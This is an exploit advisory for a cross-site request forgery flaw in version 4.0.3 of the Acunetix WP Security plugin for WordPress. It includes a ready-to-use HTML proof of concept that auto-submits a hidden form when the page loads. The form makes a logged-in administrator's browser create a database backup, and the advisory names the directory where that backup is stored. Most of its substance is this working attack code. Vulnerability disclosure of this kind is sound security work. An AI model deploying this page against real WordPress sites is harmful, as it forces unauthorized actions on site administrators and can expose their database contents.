WordPress Acunetix WP Security Make Backup 4.0.3 CSRF

`###################################################################################################################################  
# Exploit Title: Wordpress Plugin - Acunetix WP Security Make Backup CSRF  
# Date: 2014 11 Fabruary  
# Exploit Author: Yashar shahinzadeh  
# Special thanks to Mormoroth  
# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir  
# Vendor Homepage: http://wordpress.org/plugins/wp-security-scan/  
# Tested on: Linux & Windows, PHP 5.3.2  
# Affected Version : 4.0.3 (Last)  
#  
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }  
###################################################################################################################################  
  
Summary:  
========  
1. CSRF / Get Backup  
2. Further Information  
  
1. CSRF / Get Backup:  
=====================  
The Acunetix WP Security Suffers from CSRF attack, getting backup of wordpress database and saving it in backup folder. Although it has a good random generator function producing   
none-guessable numeric values, it still is a vulnerability which can be used against wordpress in a complex attack scenario. Here is a simple exploit:  
  
<html>  
<body onload="submitForm()">  
<form name="myForm" id="myForm" action="http://localhost/wordpress-3.8/wp-admin/admin.php?page=wps_database" method="post">  
<input type="hidden" name="wsd_db_backup" value="">  
<input type="hidden" name="backupDatabaseButton" value="Backup+now%21">  
</form>  
<script type='text/javascript'>document.myForm.submit();</script>  
</html>  
  
Backup files are stored in /wp-content/plugins/wp-security-scan/res/backups/ directory. It's protected with an index, though.  
  
2. Further Information:  
=======================  
Further analysis about backup function and attacking against it can be found at my blog, http://blog.y-shahinzadeh.ir  
  
/** Yasshar Shahinzadeh **/`